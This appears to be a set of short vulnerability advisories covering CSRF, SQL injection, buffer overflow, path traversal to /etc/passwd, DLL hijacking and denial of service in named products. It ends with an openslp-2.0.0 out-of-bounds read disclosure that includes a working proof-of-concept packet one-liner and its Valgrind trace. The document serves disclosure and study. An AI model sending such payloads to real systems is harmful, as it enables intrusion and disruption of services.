Easyndexer 1.0 is vulnerable to Cross-Site Request Forgery (CSRF) which allows an attacker to add an administrator user to the application. An attacker can craft a malicious HTML page containing a form with the necessary parameters to add an administrator user. When a logged-in user visits the malicious page, the form will be automatically submitted and an administrator user will be added to the application.
A buffer overflow vulnerability exists in CuteFTP 9.3.0.3 which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused by a boundary error when handling specially crafted input. This can be exploited to cause a stack-based buffer overflow via an overly long, specially crafted string passed to the application when connecting to a malicious FTP server. Successful exploitation of this vulnerability may allow execution of arbitrary code.
A SQL injection vulnerability exists in Facturation System 1.0, which allows an attacker to execute arbitrary SQL commands via the 'modid' parameter in a POST request to ajax/editar_producto.php. This can be exploited to read, modify or delete data from the database.
The Don 1.0.1 is vulnerable to SQL Injection. An attacker can send a specially crafted HTTP POST request to the vulnerable application in order to execute arbitrary SQL commands in the back-end database. This can be exploited to manipulate or disclose sensitive data.
A Cross-Site Request Forgery (CSRF) vulnerability was discovered in TP-Link Archer C50 Wireless Router 171227. An attacker can exploit this vulnerability to disclose the configuration file of the router.
This plugin can be used to manage uploaded files (rename files, see a preview, delete them, and move them to other folders under the WordPress upload folder). It can be used by administrator, author, contributor and subscriber users. An attacker can exploit this vulnerability to traverse directories and access sensitive information such as the /etc/passwd file, or to move any file to any directory.
Data Center Audit 2.6.2 is vulnerable to SQL Injection in the 'username' parameter of the dca_login.php page. An attacker can exploit this vulnerability to gain access to the database and execute arbitrary SQL commands.
HeidiSQL 9.5.0.5196 is vulnerable to Denial of Service attack when a maliciously crafted bd.txt file is used. By copying the content of the bd.txt file to the clipboard and pasting it into the 'Write SQL log to file' field in the 'Preferences' > 'Logging' menu, the application will crash.
DLL hijacking is a type of vulnerability that can be exploited by attackers to execute malicious code on a target system. It occurs when an application looks for a specific DLL to run a certain task, but an attacker provides a malicious DLL instead. This malicious DLL is then executed on the target system, allowing the attacker to gain control of the system. The vulnerability was first discovered in 2010 and affects Windows systems.
I discovered some bugs in openslp-2.0.0 back in January, 2018. One of them I disclosed in June (dumpco.re/blog/openslp-2.0.0-double-free), and today I'm disclosing two more. This issue is an OOB read that does not crash the application. After the occurrence of the bug the application actually detects the error and ignores the malicious packet.

Proof of concept exploit:

    echo -n "AgMAAAAAAAAAAAAAAAAAAPQAATEAAAAAB2VuAAAAF3M=" | base64 -d > /dev/udp/127.0.0.1/427

Valgrind report:

    ==27968== Invalid read of size 1
    ==27968==    at 0x412436: GetUINT16 (slp_message.c:63)
    ==27968==    by 0x4159C7: v2ParseSrvReg (slp_v2message.c:327)
    ==27968==    by 0x4159C7: SLPv2MessageParseBuffer (slp_v2message.c:1005)
    ==27968==    by 0x40BF4A: SLPDProcessMessage (slpd_process.c:1393)
    ==27968==    by 0x407139: IncomingDatagramRead (slpd_incoming.c:95)
    ==27968==    by 0x407139: SLPDIncomingHandler (slpd_incoming.c:420)
    ==27968==    by 0x40256B: main (slpd_main.c:699)
    ==27968==  Address 0x5b5c3f1 is 0 bytes after a block of size 81 alloc'd
    ==27968==    at 0x4C28C20: malloc (vg_replace_malloc.c:296)
    ==27968==    by 0x40FC1C: SLPBufferAlloc (slp_buffer.c:67)
    ==27968==    by 0x40FCBA: SLPBufferDup (slp_buffer.c:139)
    ==27968==    by 0x40BF7F: SLPDProcessMessage (slpd_process.c:1383)
    ==27968==    by 0x407139: IncomingDatagramRead (slpd_incoming.c:95)
    ==27968==    by 0x407139: SLPDIncomingHandler (slpd_incoming.c:420)
    ==27968==    by 0x40256B: main (slpd_main.c:699)